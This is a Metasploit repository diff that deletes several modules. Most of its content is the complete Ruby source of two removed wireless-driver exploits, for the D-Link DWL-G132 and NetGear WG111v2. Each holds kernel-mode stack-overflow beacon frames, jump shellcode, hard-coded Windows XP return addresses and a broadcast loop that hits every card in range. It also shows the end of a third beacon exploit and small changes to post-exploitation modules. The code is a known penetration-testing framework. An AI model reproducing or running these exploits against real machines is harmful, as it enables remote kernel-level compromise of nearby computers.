rand_text_alphanumeric(8) +
"\x64\x00" + # beacon interval
"\x11\x04" + # capability flags
#
# tagged parameters
#
# ssid tag
"\x00" + # tag: SSID parameter set
"\x5d" + # len: length is 93 bytes
# jump into the payload
"\x89\xf9" + # mov edi, ecx
"\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b
"\xff\xe1" + # jmp ecx
# padding
rand_text_alphanumeric(79) +
# return address
[target.ret].pack('V') +
# vendor specific tag
"\xdd" + # wpa
"\xff" + # big as we can make it
# the kernel-mode stager
payload.encoded
end
end

View File

@ -1,195 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = LowRanking
include Msf::Exploit::Lorcon2
include Msf::Exploit::KernelMode
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the A5AGU.SYS driver provided
with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow
allows remote code execution in kernel mode. The stack buffer overflow is triggered
when a 802.11 Beacon frame is received that contains a long Rates information
element. This exploit was tested with version 1.0.1.41 of the
A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer
versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340
adapter and appear to resolve this flaw, but D-Link does not offer an updated
driver for the DWL-G132. Since this vulnerability is exploited via beacon frames,
all cards within range of the attack will be affected. The tested adapter used
a MAC address in the range of 00:11:95:f2:XX:XX.
Vulnerable clients will need to have their card in a non-associated state
for this exploit to work. The easiest way to reproduce this bug is by starting
the exploit and then accessing the Windows wireless network browser and
forcing it to refresh.
D-Link was NOT contacted about this flaw. A search of the SecurityFocus
database indicates that D-Link has not provided an official patch or
solution for any of the seven flaws listed at the time of writing:
(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).
As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the
DWL-G132 driver (v1.21).
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Author' =>
[
'hdm', # discovery, exploit dev
'skape', # windows kernel ninjitsu
'Johnny Cache <johnnycsh [at] 802.11mercenary.net>' # making all of this possible
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2006-6055'],
['OSVDB', '30296'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-13-11-2006.html'],
['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
# Its a beautiful day in the neighborhood...
'Space' => 1000
},
'Platform' => 'win',
'Targets' =>
[
# Windows XP SP2 with the latest updates
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
[ 'Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41',
{
'Ret' => 0x8066662c, # jmp edi
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dbb27,
}
}
}
],
# Windows XP SP2 install media, no patches
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
[ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41',
{
'Ret' => 0x804f16eb, # jmp edi
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dc0c7,
}
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 13 2006'))
register_options(
[
OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
], self.class)
end
def exploit
open_wifi
stime = Time.now.to_i
rtime = datastore['RUNTIME'].to_i
count = 0
print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
while (stime + rtime > Time.now.to_i)
wifi.write(create_beacon)
select(nil, nil, nil, 0.10) if (count % 100 == 0)
count += 1
# Exit if we get a session
break if session_created?
end
print_status("Completed sending beacons.")
end
#
# The following research was provided by Gil Dabah of ZERT
#
# The long rates field bug can be triggered three different ways (at least):
# 1) Send a single rates IE with valid rates up front and long data
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data
# 3) Send two IE rates fields, with the second one containing the long data (this exploit)
#
def create_beacon
ssid = rand_text_alphanumeric(6)
bssid = ("\x00" * 2) + rand_text(4)
src = ("\x90" * 4) + "\xeb\x2b"
seq = [rand(255)].pack('n')
buff = rand_text(75)
buff[0, 2] = "\xeb\x49"
buff[71, 4] = [target.ret].pack('V')
frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
src + # src
bssid + # bssid
seq + # seq
rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x00\x05" + # capability flags
# ssid tag
"\x00" + ssid.length.chr + ssid +
# supported rates
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
# current channel
"\x03" + "\x01" + channel.chr +
# eip was his name-o
"\x01" + buff.length.chr + buff +
payload.encoded
return frame
end
end

View File

@ -1,208 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = LowRanking
include Msf::Exploit::Lorcon2
include Msf::Exploit::KernelMode
def initialize(info = {})
super(update_info(info,
'Name' => 'NetGear WG111v2 Wireless Driver Long Beacon Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the NetGear WG111v2 wireless
device driver. This stack buffer overflow allows remote code execution in kernel mode.
The stack buffer overflow is triggered when a 802.11 Beacon frame is received that
contains more than 1100 bytes worth of information elements.
This exploit was tested with version 5.1213.6.316 of the WG111v2.SYS driver and
a NetGear WG111v2 USB adapter. Since this vulnerability is exploited via beacon frames,
all cards within range of the attack will be affected. The tested adapter used
a MAC address in the range of 00:18:4d:02:XX:XX.
Vulnerable clients will need to have their card in a non-associated state
for this exploit to work. The easiest way to reproduce this bug is by starting
the exploit and then unplugging and reinserting the USB card. The exploit can
take up to a minute to execute the payload, depending on system activity.
NetGear was NOT contacted about this flaw. A search of the SecurityFocus
database indicates that NetGear has not provided an official patch or
solution for any of the thirty flaws listed at the time of writing. This list
includes BIDs: 1010, 3876, 4024, 4111, 5036, 5667, 5830, 5943, 5940, 6807, 7267, 7270,
7371, 7367, 9194, 10404, 10459, 10585, 10935, 11580, 11634, 12447, 15816, 16837,
16835, 19468, and 19973.
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2006-5972'],
['OSVDB', '30473'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-16-11-2006.html'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
# Its a beautiful day in the neighborhood...
'Space' => 1000,
},
'Platform' => 'win',
'Targets' =>
[
# Windows XP SP2 with the latest updates
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
[ 'Windows XP SP2 (5.1.2600.2122), WG111v2.SYS 5.1213.6.316',
{
'Ret' => 0x80502d7f, # jmp esp
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dbb27,
}
}
}
],
# Windows XP SP2 install media, no patches
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
[ 'Windows XP SP2 (5.1.2600.2180), WG111v2.SYS 5.1213.6.316',
{
'Ret' => 0x804ed5cb, # jmp esp
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dc0c7,
}
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 16 2006'))
register_options(
[
OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
], self.class)
end
def exploit
open_wifi
stime = Time.now.to_i
rtime = datastore['RUNTIME'].to_i
count = 0
print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
while (stime + rtime > Time.now.to_i)
wifi.write(create_beacon)
select(nil, nil, nil, 0.10) if (count % 100 == 0)
count += 1
# Exit if we get a session
break if session_created?
end
print_status("Completed sending beacons.")
end
# Convert arbitrary data into a series of information elements
def ie_padding(data)
ret = 0
idx = 0
len = 0
while(idx < data.length)
len = data[idx+1]
if (! len)
data << "\x00"
len = 0
end
idx += len + 2
end
data << yield(idx - data.length)
end
def create_beacon
ssid = rand_text_alphanumeric(16)
bssid = ("\x00" * 2) + rand_text(4)
src = ("\x00" * 2) + rand_text(4)
seq = [rand(255)].pack('n')
stamp = rand_text(8)
frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
src + # src
bssid + # bssid
seq + # seq
stamp + # timestamp value
"\x64\x00" + # beacon interval
rand_text(2) + # capability flags
# ssid tag
"\x00" + ssid.length.chr + ssid +
# supported rates
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
# current channel
"\x03" + "\x01" + channel.chr
# Bounce through EDI to the uncorrupted payload
jumper =
"\x6a\x39" + # push byte +0x39
"\x58" + # pop eax
"\x01\xc7" + # add edi, eax
"\xff\xe7" # jmp edi
# Overwrite enough to pop the return
buf = rand_text(1160)
# Kernel-mode stager fun goes here
buf[0, payload.encoded.length] = payload.encoded
# Return address is a jmp ESP
buf[1101, 4] = [ target.ret ].pack('V')
# Jump back to EDI + 0x39
buf[1113, jumper.length] = jumper
# Pad it out to be a valid set of IEs
frame << ie_padding(buf) {|c| rand_text(c) }
return frame
end
end

View File

@ -11,10 +11,11 @@ class Metasploit3 < Msf::Post
super(update_info(info, super(update_info(info,
'Name' => "Windows Manage Change Password", 'Name' => "Windows Manage Change Password",
'Description' => %q{ 'Description' => %q{
This module will attempt to change the password of the targetted account. This module will attempt to change the password of the targeted account.
Its main purpose is when you have valid credentials on a remote host but The typical usage is to change a newly created account's password on a
they require a password change before you can login e.g. remote host to avoid the error, 'System error 1907 has occurred,' which
'System error 1907 has occurred.' is caused when the account policy enforces a password change before the
next login.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Platform' => ['win'], 'Platform' => ['win'],
@ -33,7 +34,7 @@ class Metasploit3 < Msf::Post
def run def run
unless client.railgun unless client.railgun
print_error('This module requires a native windows payload that supports railgun.') print_error('This module requires a native Windows payload that supports Railgun.')
return return
end end

View File

@ -1,79 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Post
require 'msf/core/module/deprecated'
include Msf::Module::Deprecated
deprecated Date.new(2014, 03, 24), 'post/multi/gather/resolve_hosts'
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Recon Resolve Hostname',
'Description' => %q{
This module resolves a hostname to IP address via the victim,
similar to the Unix 'dig' command. Since resolution happens over
an established session from the perspective of the remote host,
this module can be used to determine differences between external
and internal resolution, especially for potentially high-value
internal addresses of devices named 'mail' or 'www.'
},
'License' => MSF_LICENSE,
'Author' => [ 'mubix' ],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
register_options(
[
OptString.new('HOSTNAME', [false, 'Hostname to lookup', nil]),
OptPath.new('HOSTFILE', [false, 'Line separated file with hostnames to resolve', nil]),
OptBool.new('SAVEHOSTS', [true, 'Save resolved hosts to the database', true])
], self.class)
end
def resolve_hostname(hostname)
begin
vprint_status("Looking up IP for #{hostname}")
result = client.net.resolve.resolve_host(hostname)
if result[:ip].nil? or result[:ip].blank?
print_error("Failed to resolve #{hostname}")
return
else
hostip = result[:ip]
end
print_status("#{hostname} resolves to #{hostip}")
if datastore['SAVEHOSTS']
report_host({
:host => hostip,
:name => hostname
})
end
rescue Rex::Post::Meterpreter::RequestError
print_status('Windows 2000 and prior does not support getaddrinfo')
end
end
def run
if datastore['HOSTNAME']
resolve_hostname(datastore['HOSTNAME'])
end
if datastore['HOSTFILE']
::File.open(datastore['HOSTFILE'], "rb").each_line do |hostname|
if hostname.strip != ""
resolve_hostname(hostname.strip)
end
end
end
end
end